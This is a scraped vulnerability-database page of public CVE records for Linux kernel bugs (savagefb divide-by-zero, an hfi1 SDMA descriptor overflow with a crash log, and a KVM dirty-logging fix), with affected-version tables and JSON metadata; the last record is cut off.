	https://git.kernel.org/stable/c/8c54acf33e5adaad6…
	https://git.kernel.org/stable/c/070398d32c5f3ab0e…
	https://git.kernel.org/stable/c/bc3c2e58d73b28b9a…
	https://git.kernel.org/stable/c/a9ca4e80d23474f90…
	https://git.kernel.org/stable/c/04e5eac8f3ab2ff52…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 224453de8505aede1890f007be973925a3edf6a1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 512ee6d6041e007ef5bf200c6e388e172a2c5b24 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 070398d32c5f3ab0e890374904ad94551c76aec4 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < bc3c2e58d73b28b9a8789fca84778ee165a72d13 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < a9ca4e80d23474f90841251f4ac0d941fa337a01 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26778",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T16:06:44.068367Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T16:06:55.000Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.314Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/224453de8505aede1890f007be973925a3edf6a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/512ee6d6041e007ef5bf200c6e388e172a2c5b24"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/070398d32c5f3ab0e890374904ad94551c76aec4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bc3c2e58d73b28b9a8789fca84778ee165a72d13"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9ca4e80d23474f90841251f4ac0d941fa337a01"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/savage/savagefb_driver.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "224453de8505aede1890f007be973925a3edf6a1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "512ee6d6041e007ef5bf200c6e388e172a2c5b24",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "070398d32c5f3ab0e890374904ad94551c76aec4",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "bc3c2e58d73b28b9a8789fca84778ee165a72d13",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "a9ca4e80d23474f90841251f4ac0d941fa337a01",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/savage/savagefb_driver.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: savage: Error out if pixclock equals zero\n\nThe userspace program could pass any values to the driver through\nioctl() interface. If the driver doesn\u0027t check the value of pixclock,\nit may cause divide-by-zero error.\n\nAlthough pixclock is checked in savagefb_decode_var(), but it is not\nchecked properly in savagefb_probe(). Fix this by checking whether\npixclock is zero in the function savagefb_check_var() before\ninfo-\u003evar.pixclock is used as the divisor.\n\nThis is similar to CVE-2022-3061 in i740fb which was fixed by\ncommit 15cf0b8."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:34:32.658Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/224453de8505aede1890f007be973925a3edf6a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff"
        },
        {
          "url": "https://git.kernel.org/stable/c/512ee6d6041e007ef5bf200c6e388e172a2c5b24"
        },
        {
          "url": "https://git.kernel.org/stable/c/8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/070398d32c5f3ab0e890374904ad94551c76aec4"
        },
        {
          "url": "https://git.kernel.org/stable/c/bc3c2e58d73b28b9a8789fca84778ee165a72d13"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9ca4e80d23474f90841251f4ac0d941fa337a01"
        },
        {
          "url": "https://git.kernel.org/stable/c/04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288"
        }
      ],
      "title": "fbdev: savage: Error out if pixclock equals zero",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26778",
    "datePublished": "2024-04-03T17:01:08.782Z",
    "dateReserved": "2024-02-19T14:20:24.177Z",
    "dateUpdated": "2026-01-05T10:34:32.658Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26766 (GCVE-0-2024-26766)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2025-05-04 12:54

Title

IB/hfi1: Fix sdma.h tx->num_descs off-by-one error

Summary

In the Linux kernel, the following vulnerability has been resolved: IB/hfi1: Fix sdma.h tx->num_descs off-by-one error Unfortunately the commit `fd8958efe877` introduced another error causing the `descs` array to overflow. This reults in further crashes easily reproducible by `sendmsg` system call. [ 1080.836473] general protection fault, probably for non-canonical address 0x400300015528b00a: 0000 [#1] PREEMPT SMP PTI [ 1080.869326] RIP: 0010:hfi1_ipoib_build_ib_tx_headers.constprop.0+0xe1/0x2b0 [hfi1] -- [ 1080.974535] Call Trace: [ 1080.976990] <TASK> [ 1081.021929] hfi1_ipoib_send_dma_common+0x7a/0x2e0 [hfi1] [ 1081.027364] hfi1_ipoib_send_dma_list+0x62/0x270 [hfi1] [ 1081.032633] hfi1_ipoib_send+0x112/0x300 [hfi1] [ 1081.042001] ipoib_start_xmit+0x2a9/0x2d0 [ib_ipoib] [ 1081.046978] dev_hard_start_xmit+0xc4/0x210 -- [ 1081.148347] __sys_sendmsg+0x59/0xa0 crash> ipoib_txreq 0xffff9cfeba229f00 struct ipoib_txreq { txreq = { list = { next = 0xffff9cfeba229f00, prev = 0xffff9cfeba229f00 }, descp = 0xffff9cfeba229f40, coalesce_buf = 0x0, wait = 0xffff9cfea4e69a48, complete = 0xffffffffc0fe0760 <hfi1_ipoib_sdma_complete>, packet_len = 0x46d, tlen = 0x0, num_desc = 0x0, desc_limit = 0x6, next_descq_idx = 0x45c, coalesce_idx = 0x0, flags = 0x0, descs = {{ qw = {0x8024000120dffb00, 0x4} # SDMA_DESC0_FIRST_DESC_FLAG (bit 63) }, { qw = { 0x3800014231b108, 0x4} }, { qw = { 0x310000e4ee0fcf0, 0x8} }, { qw = { 0x3000012e9f8000, 0x8} }, { qw = { 0x59000dfb9d0000, 0x8} }, { qw = { 0x78000e02e40000, 0x8} }} }, sdma_hdr = 0x400300015528b000, <<< invalid pointer in the tx request structure sdma_status = 0x0, SDMA_DESC0_LAST_DESC_FLAG (bit 62) complete = 0x0, priv = 0x0, txq = 0xffff9cfea4e69880, skb = 0xffff9d099809f400 } If an SDMA send consists of exactly 6 descriptors and requires dword padding (in the 7th descriptor), the sdma_txreq descriptor array is not properly expanded and the packet will overflow into the container structure. This results in a panic when the send completion runs. The exact panic varies depending on what elements of the container structure get corrupted. The fix is to use the correct expression in _pad_sdma_tx_descs() to test the need to expand the descriptor array. With this patch the crashes are no longer reproducible and the machine is stable.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/115b7f3bc1dce590a…
	https://git.kernel.org/stable/c/5833024a9856f454a…
	https://git.kernel.org/stable/c/3f38d22e645e2e994…
	https://git.kernel.org/stable/c/47ae64df23ed1318e…
	https://git.kernel.org/stable/c/52dc9a7a573dbf778…
	https://git.kernel.org/stable/c/a2fef1d81becf4ff6…
	https://git.kernel.org/stable/c/9034a1bec35e9f725…
	https://git.kernel.org/stable/c/e6f57c6881916df39…

Impacted products

Vendor

Product

Version

Linux

Affected: d1c1ee052d25ca23735eea912f843bc7834781b4 , < 115b7f3bc1dce590a6851a2dcf23dc1100c49790 (git)
Affected: 40ac5cb6cbb01afa40881f78b4d2f559fb7065c4 , < 5833024a9856f454a964a198c63a57e59e07baf5 (git)
Affected: 6cf8f3d690bb5ad31ef0f41a6206ecf5a068d179 , < 3f38d22e645e2e994979426ea5a35186102ff3c2 (git)
Affected: bd57756a7e43c7127d0eca1fc5868e705fd0f7ba , < 47ae64df23ed1318e27bd9844e135a5e1c0e6e39 (git)
Affected: eeaf35f4e3b360162081de5e744cf32d6d1b0091 , < 52dc9a7a573dbf778625a0efca0fca55489f084b (git)
Affected: fd8958efe8779d3db19c9124fce593ce681ac709 , < a2fef1d81becf4ff60e1a249477464eae3c3bc2a (git)
Affected: fd8958efe8779d3db19c9124fce593ce681ac709 , < 9034a1bec35e9f725315a3bb6002ef39666114d9 (git)
Affected: fd8958efe8779d3db19c9124fce593ce681ac709 , < e6f57c6881916df39db7d95981a8ad2b9c3458d6 (git)
Affected: 0ef9594936d1f078e8599a1cf683b052df2bec00 (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26766",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-03T18:11:09.801717Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:44.178Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.309Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/115b7f3bc1dce590a6851a2dcf23dc1100c49790"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5833024a9856f454a964a198c63a57e59e07baf5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f38d22e645e2e994979426ea5a35186102ff3c2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/47ae64df23ed1318e27bd9844e135a5e1c0e6e39"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52dc9a7a573dbf778625a0efca0fca55489f084b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a2fef1d81becf4ff60e1a249477464eae3c3bc2a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9034a1bec35e9f725315a3bb6002ef39666114d9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e6f57c6881916df39db7d95981a8ad2b9c3458d6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/hfi1/sdma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "115b7f3bc1dce590a6851a2dcf23dc1100c49790",
              "status": "affected",
              "version": "d1c1ee052d25ca23735eea912f843bc7834781b4",
              "versionType": "git"
            },
            {
              "lessThan": "5833024a9856f454a964a198c63a57e59e07baf5",
              "status": "affected",
              "version": "40ac5cb6cbb01afa40881f78b4d2f559fb7065c4",
              "versionType": "git"
            },
            {
              "lessThan": "3f38d22e645e2e994979426ea5a35186102ff3c2",
              "status": "affected",
              "version": "6cf8f3d690bb5ad31ef0f41a6206ecf5a068d179",
              "versionType": "git"
            },
            {
              "lessThan": "47ae64df23ed1318e27bd9844e135a5e1c0e6e39",
              "status": "affected",
              "version": "bd57756a7e43c7127d0eca1fc5868e705fd0f7ba",
              "versionType": "git"
            },
            {
              "lessThan": "52dc9a7a573dbf778625a0efca0fca55489f084b",
              "status": "affected",
              "version": "eeaf35f4e3b360162081de5e744cf32d6d1b0091",
              "versionType": "git"
            },
            {
              "lessThan": "a2fef1d81becf4ff60e1a249477464eae3c3bc2a",
              "status": "affected",
              "version": "fd8958efe8779d3db19c9124fce593ce681ac709",
              "versionType": "git"
            },
            {
              "lessThan": "9034a1bec35e9f725315a3bb6002ef39666114d9",
              "status": "affected",
              "version": "fd8958efe8779d3db19c9124fce593ce681ac709",
              "versionType": "git"
            },
            {
              "lessThan": "e6f57c6881916df39db7d95981a8ad2b9c3458d6",
              "status": "affected",
              "version": "fd8958efe8779d3db19c9124fce593ce681ac709",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "0ef9594936d1f078e8599a1cf683b052df2bec00",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/hw/hfi1/sdma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "4.19.291",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "5.4.251",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "5.10.188",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "5.15.99",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "6.1.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.2.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/hfi1: Fix sdma.h tx-\u003enum_descs off-by-one error\n\nUnfortunately the commit `fd8958efe877` introduced another error\ncausing the `descs` array to overflow. This reults in further crashes\neasily reproducible by `sendmsg` system call.\n\n[ 1080.836473] general protection fault, probably for non-canonical address 0x400300015528b00a: 0000 [#1] PREEMPT SMP PTI\n[ 1080.869326] RIP: 0010:hfi1_ipoib_build_ib_tx_headers.constprop.0+0xe1/0x2b0 [hfi1]\n--\n[ 1080.974535] Call Trace:\n[ 1080.976990]  \u003cTASK\u003e\n[ 1081.021929]  hfi1_ipoib_send_dma_common+0x7a/0x2e0 [hfi1]\n[ 1081.027364]  hfi1_ipoib_send_dma_list+0x62/0x270 [hfi1]\n[ 1081.032633]  hfi1_ipoib_send+0x112/0x300 [hfi1]\n[ 1081.042001]  ipoib_start_xmit+0x2a9/0x2d0 [ib_ipoib]\n[ 1081.046978]  dev_hard_start_xmit+0xc4/0x210\n--\n[ 1081.148347]  __sys_sendmsg+0x59/0xa0\n\ncrash\u003e ipoib_txreq 0xffff9cfeba229f00\nstruct ipoib_txreq {\n  txreq = {\n    list = {\n      next = 0xffff9cfeba229f00,\n      prev = 0xffff9cfeba229f00\n    },\n    descp = 0xffff9cfeba229f40,\n    coalesce_buf = 0x0,\n    wait = 0xffff9cfea4e69a48,\n    complete = 0xffffffffc0fe0760 \u003chfi1_ipoib_sdma_complete\u003e,\n    packet_len = 0x46d,\n    tlen = 0x0,\n    num_desc = 0x0,\n    desc_limit = 0x6,\n    next_descq_idx = 0x45c,\n    coalesce_idx = 0x0,\n    flags = 0x0,\n    descs = {{\n        qw = {0x8024000120dffb00, 0x4}  # SDMA_DESC0_FIRST_DESC_FLAG (bit 63)\n      }, {\n        qw = {  0x3800014231b108, 0x4}\n      }, {\n        qw = { 0x310000e4ee0fcf0, 0x8}\n      }, {\n        qw = {  0x3000012e9f8000, 0x8}\n      }, {\n        qw = {  0x59000dfb9d0000, 0x8}\n      }, {\n        qw = {  0x78000e02e40000, 0x8}\n      }}\n  },\n  sdma_hdr =  0x400300015528b000,  \u003c\u003c\u003c invalid pointer in the tx request structure\n  sdma_status = 0x0,                   SDMA_DESC0_LAST_DESC_FLAG (bit 62)\n  complete = 0x0,\n  priv = 0x0,\n  txq = 0xffff9cfea4e69880,\n  skb = 0xffff9d099809f400\n}\n\nIf an SDMA send consists of exactly 6 descriptors and requires dword\npadding (in the 7th descriptor), the sdma_txreq descriptor array is not\nproperly expanded and the packet will overflow into the container\nstructure. This results in a panic when the send completion runs. The\nexact panic varies depending on what elements of the container structure\nget corrupted. The fix is to use the correct expression in\n_pad_sdma_tx_descs() to test the need to expand the descriptor array.\n\nWith this patch the crashes are no longer reproducible and the machine is\nstable."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:54:42.053Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/115b7f3bc1dce590a6851a2dcf23dc1100c49790"
        },
        {
          "url": "https://git.kernel.org/stable/c/5833024a9856f454a964a198c63a57e59e07baf5"
        },
        {
          "url": "https://git.kernel.org/stable/c/3f38d22e645e2e994979426ea5a35186102ff3c2"
        },
        {
          "url": "https://git.kernel.org/stable/c/47ae64df23ed1318e27bd9844e135a5e1c0e6e39"
        },
        {
          "url": "https://git.kernel.org/stable/c/52dc9a7a573dbf778625a0efca0fca55489f084b"
        },
        {
          "url": "https://git.kernel.org/stable/c/a2fef1d81becf4ff60e1a249477464eae3c3bc2a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9034a1bec35e9f725315a3bb6002ef39666114d9"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6f57c6881916df39db7d95981a8ad2b9c3458d6"
        }
      ],
      "title": "IB/hfi1: Fix sdma.h tx-\u003enum_descs off-by-one error",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26766",
    "datePublished": "2024-04-03T17:00:48.642Z",
    "dateReserved": "2024-02-19T14:20:24.173Z",
    "dateUpdated": "2025-05-04T12:54:42.053Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26990 (GCVE-0-2024-26990)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:27 – Updated: 2025-11-04 17:15

Title

KVM: x86/mmu: Write-protect L2 SPTEs in TDP MMU when clearing dirty status

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: x86/mmu: Write-protect L2 SPTEs in TDP MMU when clearing dirty status Check kvm_mmu_page_ad_need_write_protect() when deciding whether to write-protect or clear D-bits on TDP MMU SPTEs, so that the TDP MMU accounts for any role-specific reasons for disabling D-bit dirty logging. Specifically, TDP MMU SPTEs must be write-protected when the TDP MMU is being used to run an L2 (i.e. L1 has disabled EPT) and PML is enabled. KVM always disables PML when running L2, even when L1 and L2 GPAs are in the some domain, so failing to write-protect TDP MMU SPTEs will cause writes made by L2 to not be reflected in the dirty log. [sean: massage shortlog and changelog, tweak ternary op formatting]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cdf811a937471af2d…
	https://git.kernel.org/stable/c/e20bff0f1b2de9cfe…
	https://git.kernel.org/stable/c/2673dfb591a359c75…

Impacted products

Vendor

Product

Version

Linux

Affected: 5982a5392663b30f57ee90b0372c19a7e9cb655a , < cdf811a937471af2d1facdf8ae80e5e68096f1ed (git)
Affected: 5982a5392663b30f57ee90b0372c19a7e9cb655a , < e20bff0f1b2de9cfe303dd35ff46470104a87404 (git)
